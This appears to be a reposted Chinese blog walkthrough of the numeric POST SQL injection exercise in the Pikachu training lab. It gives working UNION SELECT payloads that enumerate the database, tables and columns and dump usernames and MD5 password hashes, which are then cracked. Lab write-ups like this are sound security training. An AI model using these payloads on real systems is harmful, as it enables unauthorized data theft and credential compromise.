Pikachu--数字型注入(post)

2024-01-09 00:39:53

Pikachu--数字型注入(post)

  1. 进入页面

输入?127.0.0.1/pikachu?选择sql注入(数字型)

2)打开foxy代理,输入值“1”进行bp抓包

3)将这个获取的包转发到Repeater中

判断注入点

4)用单引号“’”,判断有无注入点,再点击Send获取结果

5)输入id=1 and 1=2 返回结果报错

6)id=1 and 1=1 回显正常,存在注入点,验证了数字型注入。

判断返回字段数

判断返回结果有2列,返回3列报错,说明有2列

查询数据库名

id=1’?union select database(),version()#

得到数据库名为pikachu

获取表名

id=1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='pikachu'#

得到表名有:httpinfo,member,message,users,xssblind

查询字段名

id=1 union select group_concat(column_name),2 from information_schema.columns where table_name='users'#

查询字段值

id=1 union select username,password from users#

最后结果

发现密码被md5加密了,我们通过md5在线转换网站(https://www.cmd5.com/)获得

对应账号和MD5加密的密码:

admin:e10adc3949ba59abbe56e057f20f883e(123456)

pikachu:670b14728ad9902aecba32e22fa4f6bd(000000)

test:e99a18c428cb38d5f260853678922e03(abc123)

文章来源:https://blog.csdn.net/XiaoYeZhu_1314/article/details/135369039
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。